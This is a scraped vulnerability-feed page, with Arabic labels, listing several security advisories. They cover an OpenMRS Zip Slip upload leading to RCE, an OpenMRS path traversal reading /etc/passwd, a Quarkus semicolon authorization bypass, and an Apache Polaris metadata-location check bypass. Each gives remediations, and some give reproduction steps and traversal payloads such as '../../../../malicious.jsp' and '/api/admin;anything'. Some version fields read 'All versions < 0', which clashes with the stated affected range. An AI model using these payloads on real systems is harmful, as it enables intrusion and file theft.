[c8b19bda93058794e04c8862fc7ca85c59b5fe5c](https://github.com/xwiki-contrib/macro-plantuml/commit/c8b19bda93058794e04c8862fc7ca85c59b5fe5c). ### For more information If there are any questions or comments about this advisory: * Open an issue in [JIRA XWiki.org](https://jira.xwiki.org/) * Send an email to [Security Mailing List](mailto:security@xwiki.org) ### Attribution The issue was reported by Łukasz Rybak.

نوع الثغرة

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N

عالية
📦 org.openmrs.web:openmrs-web 🏢 openmrs 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ Path Traversal 🎯 عن بعد ⚪ لم تُستغل
💬 ## Affected Versions version ≤ 2.7.8 (latest version at time of disclosure) https://github.com/openmrs/openmrs-core ## Impact The endpoint `POST /openmrs/ws/rest/v1/module` is vulnerable to a path traversal (Zip Slip) attack. An authenticated attacker can upload a crafted `.o...
📅 2026-05-04 OSV/Maven 🔗 التفاصيل

الوصف الكامل

## Affected Versions version ≤ 2.7.8 (latest version at time of disclosure) https://github.com/openmrs/openmrs-core ## Impact The endpoint `POST /openmrs/ws/rest/v1/module` is vulnerable to a path traversal (Zip Slip) attack. An authenticated attacker can upload a crafted `.omod` archive containing ZIP entries with directory traversal sequences. Upon automatic extraction by the server, the incomplete path validation in `WebModuleUtil.startModule()` fails to prevent entries such as `web/module/../../../../malicious.jsp` from being written outside the intended module directory. If the traversal target falls within the web application root (e.g., `/usr/local/tomcat/webapps/openmrs/`), the attacker achieves arbitrary file write and subsequent Remote Code Execution. Notably, other extraction methods in the same codebase (`ModuleUtil.expandJar()`, `TestInstallUtil.addZippedTestModules()`) are properly protected with `normalize().startsWith()` checks — this vulnerability is an oversight where the same fix was not applied. Furthermore, the `module.allow_web_admin` runtime property, which is intended to restrict administrators from managing modules via the web interface, only gates the Legacy UI controller entry point. The REST API endpoint `POST /openmrs/ws/rest/v1/module` does not check this property, allowing this restriction to be fully bypassed. ## Steps to Reproduce 1. Construct a malicious `.omod` file (which is a ZIP/JAR archive) containing a ZIP entry with a path traversal payload in its entry name, such as `web/module/../../../../<target_filename>`. Upload this file to `POST /openmrs/ws/rest/v1/module` with valid admin credentials via Basic Auth. <img width="1986" height="1102" alt="image" src="https://github.com/user-attachments/assets/647f15de-7e8c-40b9-aba9-d4db5d2e0b52" /> <img width="2048" height="1078" alt="image" src="https://github.com/user-attachments/assets/301412a0-e3b0-4afb-91c2-e9739de3080d" /> 2. The server parses and loads the module. During `WebModuleUtil.startModule()`, entries under `web/module/` are automatically extracted. The existing check `Paths.get(name).startsWith("..")` only blocks entries beginning with `..`, so an entry starting with `web/module/` passes the check. The `../` sequences in the remaining path cause the file to be written outside the intended `WEB-INF/view/module/` directory — for example, into the web application root at `/usr/local/tomcat/webapps/openmrs/`. <img width="1439" height="141" alt="image" src="https://github.com/user-attachments/assets/4bda3b1e-a80e-42ed-af2b-a1da53e8db03" /> 3. The traversed file is now accessible under the web application root. If the written file is a JSP script, accessing it via the browser triggers server-side execution, achieving RCE. <img width="1482" height="300" alt="image" src="https://github.com/user-attachments/assets/61936002-78cd-4203-80f0-f0a8702b216c" /> ## Root Cause Analysis The vulnerability exists in `WebModuleUtil.startModule()` (`web/src/main/java/org/openmrs/module/web/WebModuleUtil.java`). ### Vulnerable code: ```java Enumeration<JarEntry> entries = jarFile.entries(); while (entries.hasMoreElements()) { JarEntry entry = entries.nextElement(); String name = entry.getName(); // ❌ Incomplete check — only blocks entries starting with ".." if (Paths.get(name).startsWith("..")) { throw new UnsupportedOperationException("..."); } if (name.startsWith("web/module/")) { String filepath = name.substring(11); StringBuilder absPath = new StringBuilder(realPath + "/WEB-INF"); absPath.append("/view/module/"); absPath.append(mod.getModuleIdAsPath()).append("/").append(filepath); // ❌ No normalize() or startsWith() boundary check before writing File outFile = new File(absPath.toString().replace("/", File.separator)); outStream = new FileOutputStream(outFile, false); inStream = jarFile.getInputStream(entry); OpenmrsUtil.copyFile(inStream, outStream); } } ``` **Why the check fails:** For an entry named `web/module/foo/../../../../evil.jsp`, `Paths.get(name)` starts with `web`, not `..`, so the check passes. After `name.substring(11)`, the filepath `foo/../../../../evil.jsp` is concatenated directly into the output path without normalization, resulting in a write outside the intended directory. ### Correctly protected code in the same codebase: **`ModuleUtil.expandJar()`:** ```java // ✅ Correct — uses normalize().startsWith() if (!parent.toPath().normalize().startsWith(docBase)) { throw new UnsupportedOperationException("..."); } ``` **`TestInstallUtil.addZippedTestModules()`:** ```java // ✅ Correct — uses normalize().startsWith() if (!zipEntryFile.toPath().normalize().startsWith(moduleRepository.toPath().normalize())) { throw new IOException("Bad zip entry"); } ``` The fix pattern is already known and applied elsewhere in the codebase. `WebModuleUtil.startModule()` is an oversight. ### Bypass of `module.allow_web_admin` The `module.allow_web_admin` property only restricts module operations at the Legacy UI layer (`ModuleListController`). The REST API endpoint does not consult this property: ``` Legacy UI: POST /admin/modules/moduleList.form → allowAdmin() check → [BLOCKED] REST API: POST /ws/rest/v1/module → No allowAdmin() check → [ALLOWED] ↓ ModuleFactory.loadModule() ↓ WebModuleUtil.startModule() ← Zip Slip here, no allowAdmin check ↓ FileOutputStream.write() ← Arbitrary file write ``` ## Remediation Add `normalize().startsWith()` boundary validation before writing, consistent with the existing pattern in `ModuleUtil.expandJar()`: ```java File outFile = new File(absPath.toString().replace("/", File.separator)); // ✅ Add this check if (!outFile.toPath().normalize().startsWith( Paths.get(realPath, "WEB-INF").normalize())) { throw new UnsupportedOperationException( "Zip entry '" + name + "' would be written outside the allowed directory."); } ``` Additionally, enforce the `module.allow_web_admin` restriction consistently across all module upload entry points, including the REST API.

الإصدارات المتأثرة

All versions < 0

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

عالية
📦 io.quarkus:quarkus-vertx-http 🏢 quarkus 📌 All versions < 0.23.0, 0.23.1, 0.23.2, 0.24.0, 0.25.0 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ Incorrect Authorization 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 Quarkus version 3.32.4 is vulnerable to an authorization bypass issue (GHSL-2026-099), in which semicolons (matrix parameters) in HTTP requests can be used to bypass security constraints, potentially allowing unauthorized access to protected resources. Unauthenticated or lower-p...
📅 2026-05-04 OSV/Maven 🔗 التفاصيل

الوصف الكامل

Quarkus version 3.32.4 is vulnerable to an authorization bypass issue (GHSL-2026-099), in which semicolons (matrix parameters) in HTTP requests can be used to bypass security constraints, potentially allowing unauthorized access to protected resources. Unauthenticated or lower-privileged users can bypass HTTP path-based authorization policies by appending a semicolon (`;`) and arbitrary text to the request URL. The vulnerability arises from a path-normalization inconsistency: Quarkus's [security layer](https://quarkus.io/guides/security-authorize-web-endpoints-reference) performs authorization checks on the raw URL path (which preserves matrix parameters), whereas RESTEasy Reactive's routing layer strips matrix parameters before matching endpoints. This allows requests like `/api/admin;anything` to bypass policies protecting `/api/admin` while still routing to the protected endpoint. ### Impact This issue may lead to Authentication/Authorization bypasses. ### Credits This issue was discovered with the [GitHub Security Lab Taskflow Agent](https://github.com/GitHubSecurityLab/seclab-taskflow-agent) and manually verified by GHSL team members [@p- (Peter Stöckli)](https://github.com/p-) and [@m-y-mo (Man Yue Mo)](https://github.com/m-y-mo).

الإصدارات المتأثرة

All versions < 0.23.0, 0.23.1, 0.23.2, 0.24.0, 0.25.0

نوع الثغرة

CWE-863 — Incorrect Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

عالية
📦 org.openmrs.web:openmrs-web 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ Path Traversal 🎯 عن بعد ⚪ لم تُستغل
💬 ## Affected Versions version ≤ 2.7.8 (latest version at time of disclosure) https://github.com/openmrs/openmrs-core ## Impact The `/openmrs/moduleResources/{moduleid}` endpoint in OpenMRS Core is vulnerable to a path traversal attack. The `ModuleResourcesServlet` does not pro...
📅 2026-05-04 OSV/Maven 🔗 التفاصيل

الوصف الكامل

## Affected Versions version ≤ 2.7.8 (latest version at time of disclosure) https://github.com/openmrs/openmrs-core ## Impact The `/openmrs/moduleResources/{moduleid}` endpoint in OpenMRS Core is vulnerable to a path traversal attack. The `ModuleResourcesServlet` does not properly validate user-supplied path input, allowing an attacker to traverse directories and read arbitrary files from the server filesystem (e.g., `/etc/passwd`, application configuration files containing database credentials). This endpoint serves static module resources (CSS, JS, images) and is **not protected by authentication filters**, as these resources are required for rendering the login page. Therefore, this vulnerability can be exploited by an **unauthenticated** attacker. > **Note:** Successful exploitation requires the target deployment to run on **Apache Tomcat < 8.5.31**, where the `..;` path parameter bypass is not mitigated by the container. Deployments on Tomcat ≥ 8.5.31 / ≥ 9.0.10 are protected at the container level, though the underlying code defect remains. > ## Steps to Reproduce 1. Identify a valid installed module ID on the target OpenMRS instance (e.g., `legacyui`). 2. Send the following HTTP request: <img width="1038" height="798" alt="image" src="https://github.com/user-attachments/assets/7d10ee0e-4d81-4c01-bc84-a1bf5715f170" /> 3. The server responds with HTTP 200 and the contents of `/etc/passwd`: <img width="1028" height="843" alt="image" src="https://github.com/user-attachments/assets/b6806a7e-ff52-4f51-8f7f-7ea4e9754d10" /> ## Root Cause Analysis The vulnerability exists in `ModuleResourcesServlet.java` (`web/src/main/java/org/openmrs/module/web/ModuleResourcesServlet.java`). The `getFile()` method constructs a filesystem path from user-controlled input without performing path boundary validation: ```java protected File getFile(HttpServletRequest request) { // Step 1: User-controlled path input String path = request.getPathInfo(); // Step 2: Extract module from path prefix Module module = ModuleUtil.getModuleForPath(path); if (module == null) { return null; } // Step 3: Strip module ID prefix — no traversal check String relativePath = ModuleUtil.getPathForResource(module, path); // Step 4: Concatenate into absolute path String realPath = getServletContext().getRealPath("") + MODULE_PATH + module.getModuleIdAsPath() + "/resources" + relativePath; // contains "/../../../etc/passwd" realPath = realPath.replace("/", File.separator); // Step 5: No normalize().startsWith() boundary check File f = new File(realPath); if (!f.exists()) { return null; } return f; // Arbitrary file returned to client } ``` The helper method `ModuleUtil.getPathForResource()` only strips the module ID prefix and performs no sanitization: ```java public static String getPathForResource(Module module, String path) { if (path.startsWith("/")) { path = path.substring(1); } return path.substring(module.getModuleIdAsPath().length()); // Returns unsanitized remainder, e.g., "/../../../../../../etc/passwd" } ``` The resulting path resolves as: ``` {webapp}/WEB-INF/view/module/legacyui/resources/../../../../../../etc/passwd → /etc/passwd ``` Notably, the same codebase already implements correct path traversal protection in `StartupFilter.java`: ```java // StartupFilter.java — correct protection fullFilePath = fullFilePath.resolve(httpRequest.getPathInfo()); if (!(fullFilePath.normalize().startsWith(filePath))) { log.warn("Detected attempted directory traversal..."); return; // Request rejected } ``` This check is absent from `ModuleResourcesServlet`. ## Remediation Add a path boundary check after constructing `realPath` and before returning the `File` object. The fix should use `normalize()` + `startsWith()` to ensure the resolved path stays within the allowed module resources directory: ```java File f = new File(realPath); Path allowedBase = Paths.get(getServletContext().getRealPath(""), "WEB-INF", "view", "module"); if (!f.toPath().normalize().startsWith(allowedBase.normalize())) { log.warn("Blocked path traversal attempt: {}", request.getPathInfo()); return null; } ``` This is consistent with the existing pattern used in `StartupFilter.java` and `TestInstallUtil.java` within the same project.

الإصدارات المتأثرة

All versions < 0

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

9.9/10 حرجة
📦 org.apache.polaris:polaris-runtime-service 📌 1.0.0-incubating, 1.0.1-incubating, 1.1.0-incubating, 1.2.0-incubating, 1.3.0-incubating 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ Input Validation 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 In Apache Iceberg, the table's metadata files are control files: they tell readers which data files belong to the table and which table version to read. `write.metadata.path` is an optional table property that tells Polaris where to write those metadata files. For a table alr...
📅 2026-05-04 NVD 🔗 التفاصيل

الوصف الكامل

In Apache Iceberg, the table's metadata files are control files: they tell readers which data files belong to the table and which table version to read. `write.metadata.path` is an optional table property that tells Polaris where to write those metadata files. For a table already registered in a Polaris-managed catalog, changing only that property through an `ALTER TABLE`-style settings change (not a row-level `INSERT`, `SELECT`, `UPDATE`, or `DELETE`) bypasses the commit-time branch that is supposed to revalidate storage locations. The full persisted / credential-vending variant requires the affected catalog to have `polaris.config.allow.unstructured.table.location=true`, with `allowedLocations` broad enough to include the attacker-chosen target. `allowedLocations` is the admin-configured allowlist of storage paths that the catalog is allowed to use. Public project materials suggest that this flag is a real supported compatibility / layout mode, not just a contrived lab-only prerequisite. In that configuration, a user who can change table settings can cause Apache Polaris itself to write new table metadata to an attacker-chosen reachable storage location before the intended location-validation branch runs. If the later concrete-path validation also accepts that location, Polaris persists the resulting metadata path into stored table state. Later table-load and credential APIs can then return temporary cloud-storage credentials for the same location without revalidating it. In plain terms, Polaris can later hand out temporary storage access for the same attacker-chosen area. That attacker-chosen area does not need to be limited to the poisoned table's own files. If it is a broader storage prefix, another table's prefix, or, depending on configuration or provider behavior, even a bucket/container root, the resulting disclosure or corruption scope can extend to any data and metadata Polaris can reach there. The practical consequences are therefore similar to the staged-create credential-vending issue already discussed: data and metadata reachable in that storage scope can be exposed and, if write-capable credentials are later issued, modified, corrupted, or removed. Even before that later credential step, Polaris itself performs the metadata write to the unchecked location. So the core issue is not only later credential vending. The primary defect is that Polaris skips its intended location checks before performing a security- sensitive metadata write when only `write.metadata.path` changes. When `polaris.config.allow.unstructured.table.location=false`, current code review suggests the later `updateTableLike(...)` validation usually rejects out-of-tree metadata locations before the unsafe path is persisted. That may reduce the persisted / credential-vending variant, but it does not prevent the underlying defect: Polaris still skips the intended pre-write location check when only `write.metadata.path` changes.

الإصدارات المتأثرة

1.0.0-incubating, 1.0.1-incubating, 1.1.0-incubating, 1.2.0-incubating, 1.3.0-incubating

نوع الثغرة

CWE-20 — Input Validation

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H